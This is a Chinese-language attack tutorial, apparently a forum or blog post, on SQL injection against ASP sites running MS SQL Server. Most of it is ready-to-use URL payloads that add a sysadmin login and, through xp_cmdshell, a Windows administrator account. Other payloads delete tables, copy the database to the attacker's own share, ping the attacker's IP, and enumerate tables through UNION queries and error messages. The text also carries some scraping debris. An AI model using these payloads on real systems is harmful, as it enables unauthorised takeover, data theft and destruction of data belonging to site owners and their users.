【执行系统命令】  
SQL injection攻击方法最早源于’or’1’=’1的漏洞（我们暂且称其为漏洞），这个漏洞的原理我想大家因该都知道了，那么随之而来的便是;exec sp_addlogin hax（在数据库内添加一个hax用户），但是这个方法的限制很大，首先ASP使用的SQL Server账号是个管理员，其次请求的提交变量在整个SQL语句的最后，因为有一些程序员采用  
SELECT * FROM news WHERE id=... AND topic=... AND .....  
这种方法请求数据库，那么如果还用以上的例子就会  
news.asp?id=2;exec sp_addlogin hax  
变成  
SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic=AND  
整个SQL语句在执行sp_addlogin的存储过程后有AND与判断存在，语法错误，你的sp_addlogin自然也不能正常运行了，因此试试看下面这个方法  
news.asp?id=2;exec sp_addlogin hax;--  
后面的--符号把sp_addlogin后的判断语句变成了注释，这样就不会有语法错误了，sp_addlogin正常执行！  
如何判断我们的命令是否成功执行了呢？我们先装一个_blank">防火墙，打开ICMP和139TCP和445TCP的警告提示然后提交  
news.asp?id=2;exec master.dbo.xp_cmdshell ’ping 你的IP’  
如果_blank">防火墙提示有人ping你，那么因该可以肯定对方的ASP用的是SQL的管理员权限，同时也确定了对方的SQL Server的准确位置，因为很多大一点的网站考虑性能，会吧web服务和数据库分开，当对方大上了补丁看不到源代码时，我想只有这个方法能很快的定位对方的SQL Server的位置了  
那么我们连一起来用吧  
news.asp?id=2;exec master.dbo.sp_addlogin hax;--　  
news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--　  
news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--　  
news.asp?id=2;exec master.dbo.xp_cmdshell ’net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes  
/active:yes /add’;--  
news.asp?id=2;exec master.dbo.xp_cmdshell ’net localgroup administrators hax /add’;--  
这样，你在他的数据库和系统内都留下了hax管理员账号了。  
当然大家可以试试看在id=2后面加上一个’符号，主要看对方的ASP怎么写了。  
运用master..Xp_cmdshell,扩展，我们就可以在目标主机上执行任意命令的，类似的还有xp_startmail, xp_sendmail, sp_makewebtask，具体的用法和master..Xp_cmdshell差不多，我在这里就不多说了。需要指明的是这种攻击方法的前提条件是ASP用管理员账号，所以虚拟空间大家就别试了，不会存在这个漏洞的。  
　 以后我们会讨论，如果对方的ASP不是用SQL管理员账号的时候，我们应该如何攻击。  
【对数据库的攻击】  
通常ASP用的SQL账号就算不是管理员也会是某个数据库的owner,至少对于这个库有很高的管理权限。大家可以试试看  
http://jsw/something.asp?newid=117;select 123;--  
呵呵，报语法错误，select 123错误，显而易见，这个ASP在newid变量后面用’号结束  
那么试试看http://jsw/something..asp?newid=117’;delete news;--  
哈哈，我想只要表名猜对了，数据库里面的信息就被删了。  
还有一种的作法，就是提交  
news.asp?id=2;declare @a;set @a=db_name();backup database @a to disk=’你的IP你的共享目录bak.dat’ ,name=’test’;--  
呵呵，你的_blank">防火墙该发出警告了，有人连接你的445或139(win9端口了，这样，对方的SQL的ip一样也可以暴露，其实backuo database到你的硬盘还是有点夸张了，如果对方数据库很庞大，你又是拨号上网，呵呵，劝你别试了，很难成功传输的。  

【从数据库中提取任意信息】  
这是本文要简单的一个重要的部分。一般来说，用于查询数据的SQL语句会用到以下的这种格式：  
someting.asp:  
v_cat = request("category")  
sqlstr="SELECT * FROM product WHERE PCategory=’" & v_cat & "’"  
set rs=conn.execute(sqlstr)  
那么我们向包含以上代码的ASP文件提交  
http://jsw/index.asp?category=food’or 1=1--’  
切换到程序中后变成  
SELECT * FROM product WHERE PCategory=’food’ or 1=1--’  
也就是说我们可以提交一些非法的值给这个ASP脚本，使它执行我们想要的SQL语句。  
下面我用一个攻击过程来说明SQL injection的利用方法。  
在使用SQL injection攻击的时候，我们首先要得到目标数据库的结构，提交  
http://jsw/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--  
INFORMATION_SCHEMA.TABLES包含的是数据库上的所有表名，我们提交的SQL语句为  
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES—  
主要是用来得到数据库上的第一个表名。当MS SQL Server尝试去执行这个语句的时侯将返回以下的信息：  

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’  
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’syssegments’ to a column of data type int.  
/index.asp, line 5  

而这种ODBC的错误信息恰好包含了我们想要的内容。现在我们得到可数据库中的第一个表名：“syssegments”这是建立数据库后系统自动生成的，接下来我们继续提交：  
http://jsw/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (’syssegments’)--  
可以得到下一个表名  
当然，我们也可以通过LIKE对数据库进行查询：  

http://jsw/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ’%25login%25’--